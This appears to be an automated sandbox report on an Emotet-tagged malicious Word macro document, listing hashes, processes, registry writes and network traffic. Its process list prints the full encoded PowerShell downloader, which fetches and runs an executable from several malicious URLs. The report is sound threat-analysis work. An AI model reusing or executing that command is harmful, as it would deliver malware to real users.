File name:

cccbc3b7b92f42bf34feeb0bfb820298eb4d21784381a55f7b07c270262c99f2.bin

Full analysis: https://app.any.run/tasks/428f2dd0-812a-471a-8a59-44c3ce7d9c09
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: July 05, 2025, 22:11:19
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
generated-doc
emotet-doc
emotet
macros
macros-on-open
susp-powershell
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: invoice Handmade Plastic Pizza Qatari Rial Legacy Secured experiences functionalities Djibouti Franc Turkmenistan parsing Road Awesome, Author: Jose Schaden, Comments: Organic holistic XSS, Template: Normal.dotm, Last Saved By: Jude Graham, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Sep 30 12:36:00 2019, Last Saved Time/Date: Mon Sep 30 12:36:00 2019, Number of Pages: 1, Number of Words: 14, Number of Characters: 84, Security: 0
MD5:

C1CF4F97A3E74F5C1BEED9D0DA31D0B8

SHA1:

4BFFE9A49F239A6296068CA074A14E27D20E1687

SHA256:

CCCBC3B7B92F42BF34FEEB0BFB820298EB4D21784381A55F7B07C270262C99F2

SSDEEP:

3072:XtrZHdqegwdWv1CYePKBcRquCbbd7tBYOtqANd3DmA6I8jRU:XtrZnuYpKaquCSiDd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • WINWORD.EXE (PID: 1984)
    • May hide the program window using WMI (SCRIPT)

      • WINWORD.EXE (PID: 1984)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 1180)
    • Creates an object to access WMI (SCRIPT)

      • WINWORD.EXE (PID: 1984)
  • INFO

    • Reads mouse settings

      • WINWORD.EXE (PID: 1984)
    • Reads security settings of Internet Explorer

      • splwow64.exe (PID: 5504)
    • An automatically generated document

      • WINWORD.EXE (PID: 1984)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 1180)
    • Checks proxy server information

      • powershell.exe (PID: 1180)
    • Disables trace logs

      • powershell.exe (PID: 1180)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: Has picture, 1Table, ExtChar
System: Windows
Word97: No
Title: invoice Handmade Plastic Pizza Qatari Rial Legacy Secured experiences functionalities Djibouti Franc Turkmenistan parsing Road Awesome
Subject: -
Author: Jose Schaden
Keywords: -
Comments: Organic holistic XSS
Template: Normal.dotm
LastModifiedBy: Jude Graham
Software: Microsoft Office Word
CreateDate: 2019:09:30 12:36:00
ModifyDate: 2019:09:30 12:36:00
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Ortiz - Bednar
CharCountWithSpaces: 97
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Sipes
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 1
TotalEditTime: -
Words: 14
Characters: 84
Pages: 1
Paragraphs: 1
Lines: 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
146
Monitored processes
7
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe splwow64.exe no specs powershell.exe conhost.exe no specs ai.exe no specs slui.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
1052"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "34AE6242-FF80-4764-93C3-ADD57B77ED38" "4C6FCC87-CB94-4CAF-9D95-DEED3D90C412" "1984"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Exit code:
0
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1132\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1180powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAG4AYwByAGUAZABpAGIAbABlAF8AUgB1AGIAYgBlAHIAXwBGAGkAcwBoAHoAbwBtAD0AJwBBAHcAZQBzAG8AbQBlAF8ARgByAGUAcwBoAF8AUwBvAGEAcABjAGEAaAAnADsAJABSAEEATQBrAGwAbQAgAD0AIAAnADUANgA1ACcAOwAkAEEAYwBjAG8AdQBuAHQAcwBxAGkAaAA9ACcAZwByAGUAZQBuAGkAbgBhACcAOwAkAEYAVABQAG0AaABsAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABSAEEATQBrAGwAbQArACcALgBlAHgAZQAnADsAJABzAHkAcwB0AGUAbQBhAHQAaQBjAGYAZgBkAD0AJwBMAGkAYQBpAHMAbwBuAHIAcwBqACcAOwAkAHMAYQBsAG0AbwBuAHcAegB3AD0AJgAoACcAbgAnACsAJwBlACcAKwAnAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBCAGMAbABpAGUAbgB0ADsAJABpAG4AdgBvAGkAYwBlAHEAegBzAD0AJwBoAHQAdABwAHMAOgAvAC8AZQBkAGUAYQBsAHMAYQBkAHYAaQBzAG8AcgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AbABZAEEAdwBRAG4ATAAvAEAAaAB0AHQAcAA6AC8ALwBtAHMAaQBzAGUAcgB2AGkAYwBlAHMALQB0AHUAbgBpAHMAaQBhAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBHAGIARgB1AG4AWgBxAHkAUgAvAEAAaAB0AHQAcABzADoALwAvAGIAcgBhAGsAYQBoAGUAbgB0AGUAcgBwAHIAaQBzAGUAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGoAeAB2AC0AZgA3AGUALQA3ADkALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBwAGgAYQBlAHQAdQBzAC4AYwBvAG0ALwBiAGwAbwBnAC4ANABkAGsAbwBuAGcAagBpAGEAbgAuAGMAbwBtAC8AYgBrAGkAaQBtAGgANAAtADIANQB2ADkAcAB6AC0AOQA1ADEAMQA3ADgAOAA1AC8AQABoAHQAdABwAHMAOgAvAC8AZAB1AGwAaQBlAHUAaABhAHkALgBjAG8AbQAvAGoAcQA1AHUAawB4AHUAZQBuAC8AWQBMAGYAUgB5AG0AagAvACcALgAiAFMAYABQAEwASQB0ACIAKAAnAEAAJwApADsAJABTAHQAcgBhAHQAZQBnAGkAcwB0AG4AcQBuAD0AJwBBAHIAYwBoAGkAdABlAGMAdABuAGMAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQAZAByAGkAdgBlAHIAcgBoAG0AIABpAG4AIAAkAGkAbgB2AG8AaQBjAGUAcQB6AHMAKQB7AHQAcgB5AHsAJABzAGEAbABtAG8AbgB3AHoAdwAuACIARABPAHcAYABOAGwAYABPAGAAQQBkAGYASQBsAEUAIgAoACQAZAByAGkAdgBlAHIAcgBoAG0ALAAgACQARgBUAFAAbQBoAGwAKQA7ACQAZwByAG8AdwB6AHcAbwA9ACcAcwBvAGwAdQB0AGkAbwBuAHMAegBpAGEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABGAFQAUABtAGgAbAApAC4AIgBsAGAARQBuAEcAVABoACIAIAAtAGcAZQAgADIAOAAzADcAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAQQBgAFIAdAAiACgAJABGAFQAUABtAGgAbAApADsAJABhAHIAYwBoAGkAdABlAGMAdAB1AHIAZQBzAG0AYQB2AD0AJwBTAHQAcgBlAGUAdABpAHcAYwAnADsAYgByAGUAYQBrADsAJABpAG4AYwBlAG4AdABpAHYAaQB6AGUAdwBiAGsAPQAnAEYAbwByAGQAcwB1AGQAagAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAByAGUAYwBvAG4AdABlAHgAdAB1AGEAbABpAHoAZQB2AGQAcAA9ACcARABlAGMAZQBuAHQAcgBhAGwAaQB6AGUAZAByAG4AdwAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
1984"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\Desktop\cccbc3b7b92f42bf34feeb0bfb820298eb4d21784381a55f7b07c270262c99f2.bin.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2200C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
4100C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5504C:\WINDOWS\splwow64.exe 8192C:\Windows\splwow64.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Print driver host for applications
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\splwow64.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
20 260
Read events
19 883
Write events
347
Delete events
30

Modification events

(PID) Process:(1984) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:0
Value:
017012000000001000B24E9A3E02000000000000000600000000000000
(PID) Process:(1984) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\1984
Operation:writeName:0
Value:
0B0E10B0DC323C1615C24DBCF99E3BC2EF1677230046DACFE7FC9BBFFBED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511C00FD2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(1984) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(1984) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(1984) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(1984) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(1984) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(1984) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
(PID) Process:(1984) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ko-kr
Value:
2
(PID) Process:(1984) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:pt-br
Value:
2
Executable files
33
Suspicious files
145
Text files
20
Unknown types
1

Dropped files

PID
Process
Filename
Type
1984WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:FB2D288A00A7EC847A85406B6FA5C278
SHA256:A3D58F9DCB354579444C22A55F9420F644DAC860757D2746065E90A8B429FBD5
1984WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:5FAA3F8BBF01BD83EACD29BFDC662F9E
SHA256:F24A8E87DD9A3D8E6B7A9C07570E8E131CB968D2282163CB433F697B057680A5
1984WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:F6358054C93A5EB61DAB60B697C198B3
SHA256:9A7B014E216943E60214DF8259CF4EBFAE1860A930C8AFCE99EAA2982092E6BA
1984WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EB0EF833.wmfbinary
MD5:5F0EC23F791040735D93987E5DB96160
SHA256:167E10898B31F762526E8E41DE0D3EC07D2E2FF4C05603F643D9182C367990D8
1984WINWORD.EXEC:\Users\admin\Desktop\~$cbc3b7b92f42bf34feeb0bfb820298eb4d21784381a55f7b07c270262c99f2.bin.docbinary
MD5:82F346A4EE41150657991BB16D9BA84C
SHA256:7FC48FEDCEE59416D5B408EDC022E225BD45A511308624AECD38FDDFE14A5860
1984WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9D4E234E.wmfbinary
MD5:3B9F8167C3F496E9782D59C0CA32ECEF
SHA256:057DF325497A7B5111B8FEC164668978C9D48CCD445E31437B1569593BE88BB9
1984WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:3451B924F756B3F038601C30FB67735C
SHA256:89E74ADC6E6D574E3880C3982F7E00C2D547B0E770FFF06E6B6AF7969CFEF0CE
1984WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A86EBC8C.wmfbinary
MD5:B999FA598F2B129C09F375D882BA27CE
SHA256:F5DD86D87D33BB09EE3376E56C91C3767E53EC876CA728E2E9A7EF3393467DEC
1984WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\91A6DEF7.wmfbinary
MD5:5F0EC23F791040735D93987E5DB96160
SHA256:167E10898B31F762526E8E41DE0D3EC07D2E2FF4C05603F643D9182C367990D8
1984WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CF962E7A.wmfbinary
MD5:DAAB9BD4295C13F4AFF08DE4CFD9BD25
SHA256:18960C77FEFB6E8F4460C462CC228E42A80DF0867A31B9BE039D1E4D47FFA84F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
16
TCP/UDP connections
64
DNS requests
29
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1180
powershell.exe
GET
146.148.238.154:80
http://msiservices-tunisia.com/wp-admin/GbFunZqyR/
unknown
malicious
1180
powershell.exe
GET
146.148.238.154:80
http://msiservices-tunisia.com/wp-admin/GbFunZqyR/
unknown
malicious
4944
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1180
powershell.exe
GET
301
23.227.38.65:80
http://www.phaetus.com/blog.4dkongjian.com/bkiimh4-25v9pz-95117885/
unknown
malicious
1268
svchost.exe
GET
200
2.16.168.114:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1984
WINWORD.EXE
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
1984
WINWORD.EXE
GET
200
2.16.168.114:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1984
WINWORD.EXE
GET
200
2.16.168.114:80
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
unknown
whitelisted
1984
WINWORD.EXE
GET
200
2.16.168.114:80
http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5944
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
7052
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
1984
WINWORD.EXE
52.109.32.97:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
whitelisted
1984
WINWORD.EXE
52.123.128.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
1984
WINWORD.EXE
2.16.168.119:443
omex.cdn.office.net
Akamai International B.V.
RU
whitelisted
1984
WINWORD.EXE
52.111.231.8:443
messaging.lifecycle.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
1180
powershell.exe
146.148.238.154:80
msiservices-tunisia.com
HENGTONG-IDC-LLC
US
malicious

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.78
whitelisted
officeclient.microsoft.com
  • 52.109.32.97
whitelisted
ecs.office.com
  • 52.123.128.14
  • 52.123.129.14
whitelisted
omex.cdn.office.net
  • 2.16.168.119
  • 2.16.168.101
whitelisted
messaging.lifecycle.office.com
  • 52.111.231.8
whitelisted
edealsadvisor.com
malicious
msiservices-tunisia.com
  • 146.148.238.154
malicious
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 40.126.31.131
  • 20.190.159.73
  • 20.190.159.128
  • 20.190.159.2
  • 40.126.31.128
  • 20.190.159.0
  • 40.126.31.73
  • 20.190.159.23
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted

Threats

No threats detected
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.